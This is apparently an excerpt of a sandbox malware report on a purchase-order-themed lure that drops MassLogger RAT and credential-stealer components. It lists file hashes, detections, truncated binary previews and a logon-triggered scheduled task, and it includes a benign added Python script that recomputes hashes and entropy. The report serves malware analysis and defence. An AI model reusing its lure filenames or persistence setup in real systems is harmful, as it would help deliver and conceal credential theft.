| PO#5_Tower_049.bat | Get hash | malicious | DBatLoader, MassLogger RAT, PureLog Stealer | Browse |
| PO_B2W984.com | Get hash | malicious | DBatLoader, MassLogger RAT, PureLog Stealer | Browse |
| PO_2024_056209_MQ04865_ENQ_1045.exe | Get hash | malicious | MassLogger RAT, PureLog Stealer | Browse |
| PO_KB#67897.cmd | Get hash | malicious | DBatLoader, MassLogger RAT, PureLog Stealer | Browse |
| Ziraat_Bankasi_Swift_Mesaji_TXB04958T.scr.exe | Get hash | malicious | MassLogger RAT | Browse |
Process: C:\Users\user\Desktop\PO#_1100015533.scr
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 1290240
Entropy (8bit): 5.277746377151687
Encrypted: false
SSDEEP: 12288:mImGUcsvZZdubv7Erl3kXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wlb:mxGBcTl0sqjnhMgeiCl7G0nehbGZpbD
MD5: 096F8412E89BED51F0B5E63CFDD50EDA
SHA1: ED860A745F40BFEA79E94DA95EC7B376C54BC504
SHA-256: ADC78A694040BAEDFA87FF024283D29A50852A2CDC52E39E4F452EC14E2CC226
SHA-512: E5BFE0AA9337C9D8EDC9DB4ECA76FD58BB1EDA4131CA8B8B7E77344934DAFA6F36BFAC4496C87B00C9BCD8309A86A5D7219996BC3453A65FD09AEAF10A2C223F
Malicious: true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........]...3...3...3...0...3...6.h.3.,.7...3.,.0...3.,.6...3...7...3...2...3...2.G.3.e.:...3.e....3.....3.e.1...3.Rich..3.................PE..L...V.+d..........................................@.........................................................................`D......................................@...p...........................p...@....................B.......................text.............................. ..`.rdata..t...........................@..@.data........`.......@..............@....didat..4............N..............@....rsrc................P..............@..@.reloc...`.......P...`..............@...........................................................................................................................................................................................................................................................
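The per-file metadata in these dropped-file records (the libmagic-style file type string, size, 8-bit entropy and the MD5/SHA-1/SHA-256/SHA-512 digests) is straightforward to reproduce when triaging a sample offline. The script below is an added example written for this page, not Joe Sandbox's own code. Its PE inputs are constructed stand-in headers, not the real dropped files; the file type wording follows the report's convention (PE32 versus PE32+ from the optional-header magic, GUI versus console from the subsystem field, machine name from the COFF header). SSDEEP is left out because it needs a third-party library.

```python
import hashlib
import math
import struct

# Added example (not Joe Sandbox code): recompute the metadata a sandbox
# report lists per dropped file. The PE headers built below are constructed
# for demonstration and are not the samples from the report.

MACHINE_NAMES = {0x014C: "Intel 80386", 0x8664: "x86-64", 0x01C4: "ARM", 0xAA64: "Aarch64"}
SUBSYSTEM_NAMES = {2: "GUI", 3: "console"}


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte, 0.0 (constant) to 8.0 (uniform)."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def digests(data: bytes) -> dict:
    """Upper-case hex digests in the same order the report prints them."""
    return {name: hashlib.new(name, data).hexdigest().upper()
            for name in ("md5", "sha1", "sha256", "sha512")}


def pe_file_type(data: bytes) -> str:
    """libmagic-style description, e.g. 'PE32 executable (GUI) Intel 80386, for MS Windows'."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return "data"
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    # Need the PE signature, the 20-byte COFF header and at least 70 bytes of optional header.
    if e_lfanew + 24 + 70 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return "MS-DOS executable"
    (machine,) = struct.unpack_from("<H", data, e_lfanew + 4)
    opt = e_lfanew + 24                                   # optional header start
    (magic,) = struct.unpack_from("<H", data, opt)        # 0x10B = PE32, 0x20B = PE32+
    (subsystem,) = struct.unpack_from("<H", data, opt + 68)  # same offset in PE32 and PE32+
    fmt = {0x10B: "PE32", 0x20B: "PE32+"}.get(magic, "PE?")
    return "%s executable (%s) %s, for MS Windows" % (
        fmt,
        SUBSYSTEM_NAMES.get(subsystem, "subsystem %d" % subsystem),
        MACHINE_NAMES.get(machine, "machine 0x%04x" % machine),
    )


def describe(data: bytes) -> dict:
    """The record fields a report shows for one file."""
    return {"file_type": pe_file_type(data), "size": len(data),
            "entropy": shannon_entropy(data), **digests(data)}


def build_pe(machine: int, magic: int, subsystem: int = 2) -> bytes:
    """Constructed minimal PE header: DOS stub, PE signature, COFF header, 96-byte optional header."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)              # e_lfanew: PE signature right after DOS header
    coff = struct.pack("<HHIIIHH", machine, 1, 0, 0, 0, 96, 0x0102)
    opt = bytearray(96)
    struct.pack_into("<H", opt, 0, magic)
    struct.pack_into("<H", opt, 68, subsystem)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt)


if __name__ == "__main__":
    for sample in (build_pe(0x014C, 0x10B), build_pe(0x8664, 0x20B)):
        for key, value in describe(sample).items():
            print("%-10s %s" % (key + ":", value))
```

Run against the real dropped files, `describe()` should reproduce the digests and entropies listed in the records. Whole-file entropy is a coarse packing indicator: a value near 7 or above, as for the 2.2 MB x86-64 file below, usually means compressed or encrypted content, while roughly 5.3 is typical of ordinary unpacked code. A large zero-filled overlay can pull the whole-file figure down and hide a packed section, so per-section entropy is the usual refinement.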
Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):2294272
Entropy (8bit):7.0403122701112615
Encrypted:false
SSDEEP:49152:O3wR2xs4r4VMm9qRzzFbju+Gb2PJsWT12BDmg27RnWGj:N24dqRzgOJ2BD527BWG
MD5:B3D71DB728AA368F048DC207BE9BC9B7
SHA1:90ABF3A0950254FB21AB673EC90BB5096B08A626
SHA-256:FB3C84D73938E663F32C193BAD4C252B48B5496B70543F47FBFA6F67FB59004A
SHA-512:3B329E9444FD35E250D054783570DA762487A95295B1B64BF14B29D406FA8F9F272DF96BCA027B00067B6D0ECF9FE7E3FE13D57A45E44BB0015DB9F093A4F307
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Process:C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):2257
Entropy (8bit):4.574646680658393
Encrypted:false
SSDEEP:48:mHAfECJTkRK1mtKiJqLXJkqI6v3BqMdJ/Jd2enyD:wAfECJTkFKiJqLWk3oMdJ/Jd25
MD5:F39DBD2946034C065D2E560FE4ED6BAC
SHA1:B0FA999C3C2EDA0FFEDEBCB60F25A1965B1DD9CE
SHA-256:BEAE30D4E7E25EFFB24E1B2EEA0593489FF5C1A815C8CF673249E055F54FA497
SHA-512:CB62DDC4CB456B6DFF4B3EBE4C50DBEEA47C8A127C0DE1250E2EA41C1EAACAFB2CB47B9E605A69B9FC6F83839CB00CE4EA86F08CE133638BABCE408A44D728D5
Malicious:false
Preview:
Disabled unneeded token privilege: SeAssignPrimaryTokenPrivilege.
Disabled unneeded token privilege: SeAuditPrivilege.
Disabled unneeded token privilege: SeBackupPrivilege.
Disabled unneeded token privilege: SeCreateGlobalPrivilege.
Disabled unneeded token privilege: SeCreatePagefilePrivilege.
Disabled unneeded token privilege: SeCreatePermanentPrivilege.
Disabled unneeded token privilege: SeCreateSymbolicLinkPrivilege.
Could not disable token privilege value: SeCreateTokenPrivilege. (1300)
Disabled unneeded token privilege: SeDebugPrivilege.
Could not disable token privilege value: SeEnableDelegationPrivilege. (1300)
Disabled unneeded token privilege: SeImpersonatePrivilege.
Disabled unneeded token privilege: SeIncreaseBasePriorityPrivilege.
Disabled unneeded token privilege: SeIncreaseQuotaPrivilege.
Disabled unneeded token privilege: SeIncreaseWorkingSetPrivilege.
Disabled unneeded token privilege: SeLoadDriverPrivilege.
Disabled unneeded token privilege: SeLockMemory
Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1293312
Entropy (8bit):5.318474212877287
Encrypted:false
SSDEEP:12288:k+zOwsOg4DrVZ0Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DB9:kwLZrVSsqjnhMgeiCl7G0nehbGZpbD
MD5:5834C05D84CD41A0A0D4619A6C0CB933
SHA1:E23A65C47D0FE1E23F5D43CB5B733BD5F2A70BF2
SHA-256:1B44A1D789C338884609990A788E0E4A6FFB229B0C3D83FF0320C6A4B5A36583
SHA-512:DFA600CEB9C4D5BE472208BC82A38E37060F652D756B824C024D8528483ABAB0AA1FEAB763E737E9B1AADBCE5C846F9408C24A0F675B6C33D192E8056A0C0730
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1297408
Entropy (8bit):5.284560300523996
Encrypted:false
SSDEEP:12288:xjrNF/Z1GtFHXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDtL:xnGXHsqjnhMgeiCl7G0nehbGZpbD
MD5:5C0F3D6E71BB2A109415D2A283E0824D
SHA1:44F7823780EBF2932222B13A4B9E641C8D4EAC93
SHA-256:6E38301D2CC3C6704CEA20B5C2C453E5C091A2F6FA4FB923D38C5A4F917E05DC
SHA-512:13310B2449C506D7E15C34E0D667992B744F2F2B46F335836E4981AF7CDA112BB41FA183874E9509F14DB54C9D1C23034E4AEAA44371F71C6BAE28BDD3E103B1
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:PE32+ executable (console) x86-64, for MS Windows
Category:dropped
Size (bytes):2106368
Entropy (8bit):6.891491654490368
Encrypted:false
SSDEEP:24576:vj9F3pnjgGHVVPZRR+riYiPe2QrUuxDnhHu8BsWsqjnhMgeiCl7G0nehbGZpbD:pMgVRWpdnrUuxDhO8hDmg27RnWGj
MD5:927D0D9DE584866A9ADBE0F2CC93C44E
SHA1:403A388D60DE2320125E3F3530ADEDE5A87AD999
SHA-256:76ED1420B2B62AF257CAB882529F2045D5E3783B43977466A51D60E5DA114603
SHA-512:B70510B18ADD01C03504559860B19BB8405318DAE508823231E002A8BAC3809200AC1432B4B66DEC8EF36DEF48C6F8D1D0AF55EB3C926ECE4AAD11A1EACB91AB
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:data
Category:dropped
Size (bytes):64
Entropy (8bit):0.34726597513537405
Encrypted:false
SSDEEP:3:Nlll:Nll
MD5:446DD1CF97EABA21CF14D03AEBC79F27
SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:false
Preview:@...e...........................................................
Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:very short file (no magic)
Category:dropped
Size (bytes):1
Entropy (8bit):0.0
Encrypted:false
SSDEEP:3:U:U
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA1:356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:false
Preview:1
Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:very short file (no magic)
Category:dropped
Size (bytes):1
Entropy (8bit):0.0
Encrypted:false
SSDEEP:3:U:U
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA1:356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:false
Preview:1
Process:C:\Users\user\Desktop\PO#_1100015533.scr
File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):98816
Entropy (8bit):5.666546286050177
Encrypted:false
SSDEEP:1536:qwa4JaIFveZKGAmwJVeDhp0dqnjErVf4UMR7pspNYZd:24Jj4ZKGHwJVeDDKqnj6bMDspNC
MD5:F6B8018A27BCDBAA35778849B586D31B
SHA1:81BDE9535B07E103F89F6AEABDB873D7E35816C2
SHA-256:DDC6B2BD4382D1AE45BEE8F3C4BB19BD20933A55BDF5C2E76C8D6C46BC1516CE
SHA-512:AA958D22952D27BAD1C0D3C9D08DDBF364274363D5359791B7B06A5D5D91A21F57E9C9E1079F3F95D7CE5828DCD3E79914FF2BD836F347B5734151D668D935DE
Malicious:true
Yara Hits:
• Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, Author: Joe Security
• Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, Author: Joe Security
• Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, Author: unknown
• Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, Author: Florian Roth
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 91%
Joe Sandbox View:
• Filename: PO#3_RKG367.bat, Detection: malicious
• Filename: PO#5_Tower_049.bat, Detection: malicious
• Filename: PO_B2W984.com, Detection: malicious
• Filename: PO_2024_056209_MQ04865_ENQ_1045.exe, Detection: malicious
• Filename: PO_KB#67897.cmd, Detection: malicious
• Filename: Ziraat_Bankasi_Swift_Mesaji_TXB04958T.scr.exe, Detection: malicious
                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....nH...............P..x............... ........@.. ....................................`.....................................S.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc..............................@..B........................H...................Z....................................................}.....is.......................~...F...@...7...%...m...$...~...~...d...r...a...G...o...n...~.....(....*&..( ....*.s!........s"........s#........s$........s%........*Z........o8...........*&..(9....*&........*".......*Vs....(B...t.........*..(C...*"~....+.*"~....+.*"~....+.*"~....+.*"~....+.*b.r...p.oa...(....(@....*:.~.....o....&*.*:.(P....(Q....*..~3...,.~3...+.~1.....x...s....%.3...(.....*..(Y....(L...
Process:C:\Users\user\Desktop\PO#_1100015533.scr
File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):70656
Entropy (8bit):4.910353963160109
Encrypted:false
SSDEEP:1536:ZPqWETbZazuYx3cOBB03Cmp3gGLWUTbUwjKX4C2b+d:ZizbZazunOKrp3gGhTbUwjI4C2Sd
MD5:E91A1DB64F5262A633465A0AAFF7A0B0
SHA1:396E954077D21E94B7C20F7AFA22A76C0ED522D0
SHA-256:F19763B48B2D2CC92E61127DD0B29760A1C630F03AD7F5055FD1ED9C7D439428
SHA-512:227D7DAD569D77EF84326E905B7726C722CEFF331246DE4F5CF84428B9721F8B2732A31401DF6A8CEF7513BCD693417D74CDD65D54E43C710D44D1726F14B0C5
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 92%
                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0.............n)... ...@....@.. ....................................`..................................)..W....@.......................`....................................................... ............... ..H............text...t.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................P)......H........>...............=..p...........................................".(!....*..s3...z..*.s.........*.(.....*Z~ ...oK...~....(!....*.(5....*&.(!.....*".......*".(u....*Vs....(v...t.........*&..(.....*Br...p(.....(...*.sL....)...*.*...0...........r...p....s........ ................. ........8[...........o.........................% ....X....o....a.o.............o....]......... ....X............o....?....(........o....o ...............8........*....0..........r)..p(....("....
Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:very short file (no magic)
Category:dropped
Size (bytes):1
Entropy (8bit):0.0
Encrypted:false
SSDEEP:3:U:U
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA1:356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:false
Preview:1
                                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                        File Type:very short file (no magic)
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1
                                                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3:U:U
                                                                                                                                                                                                                                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                                                                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                                                                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                                                                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:1
                                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                        File Type:very short file (no magic)
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1
                                                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3:U:U
                                                                                                                                                                                                                                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                                                                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                                                                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                                                                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:1
                                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                        File Type:very short file (no magic)
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1
                                                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3:U:U
                                                                                                                                                                                                                                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                                                                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                                                                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                                                                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:1
                                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                        File Type:very short file (no magic)
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1
                                                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3:U:U
                                                                                                                                                                                                                                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                                                                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                                                                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                                                                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:1
                                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                        File Type:very short file (no magic)
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1
                                                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3:U:U
                                                                                                                                                                                                                                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                                                                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                                                                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                                                                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:1
                                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                        File Type:very short file (no magic)
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1
                                                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3:U:U
                                                                                                                                                                                                                                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                                                                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                                                                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                                                                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:1
                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Roaming\hVVSnrrP.exe
                                                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1574
                                                                                                                                                                                                                                                                        Entropy (8bit):5.1060180200266325
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:2di4+S2qhZ1ty1mCUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtTxvn:cgeZQYrFdOFzOzN33ODOiDdKrsuTNv
                                                                                                                                                                                                                                                                        MD5:E78CCC54D839A8B32AE78CFDEA804A8F
                                                                                                                                                                                                                                                                        SHA1:69FFE457E4E27637BCCA55544403C0C01FF02385
                                                                                                                                                                                                                                                                        SHA-256:A9B810600BEF3FA157AFE27F3F86A71D90398FD6177AD9AFBFAE7058F81E3E71
                                                                                                                                                                                                                                                                        SHA-512:183DDD5D96DF948BDAE497C73824F224B208FB01A5B77E5FC010FF90BD175BDB58D6275A1B5C1BF30F973D6BCC68262A5EDD96E7BDCA37FF16D0C4BDD0BACFDC
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail
                                                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\PO#_1100015533.scr
                                                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text
                                                                                                                                                                                                                                                                        Category:modified
Size (bytes):1574
Entropy (8bit):5.1060180200266325
Encrypted:false
SSDEEP:24:2di4+S2qhZ1ty1mCUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtTxvn:cgeZQYrFdOFzOzN33ODOiDdKrsuTNv
MD5:E78CCC54D839A8B32AE78CFDEA804A8F
SHA1:69FFE457E4E27637BCCA55544403C0C01FF02385
SHA-256:A9B810600BEF3FA157AFE27F3F86A71D90398FD6177AD9AFBFAE7058F81E3E71
SHA-512:183DDD5D96DF948BDAE497C73824F224B208FB01A5B77E5FC010FF90BD175BDB58D6275A1B5C1BF30F973D6BCC68262A5EDD96E7BDCA37FF16D0C4BDD0BACFDC
Malicious:true
Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail
Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:very short file (no magic)
Category:dropped
Size (bytes):1
Entropy (8bit):0.0
Encrypted:false
SSDEEP:3:U:U
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA1:356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:false
Preview:1
Process:C:\Users\user\Desktop\PO#_1100015533.scr
File Type:data
Category:dropped
Size (bytes):12320
Entropy (8bit):7.985584320131843
Encrypted:false
SSDEEP:192:jzqgh4N7Jc2pn7XdC7HLea3lsbYcS5BVpwDa5YMRZlOmQLpt/n:j2gMh7tQaaZ5BTwDaqMRHOmQ9p
MD5:6E73D95A5D489C665AB4737A818869B6
SHA1:521AF798192260CFC22A9ECE9D78B12F534DE725
SHA-256:A53AD1147860088E28F0B7C7D46ADF3A31C304E107658AA9A7A83A9AFC03E09D
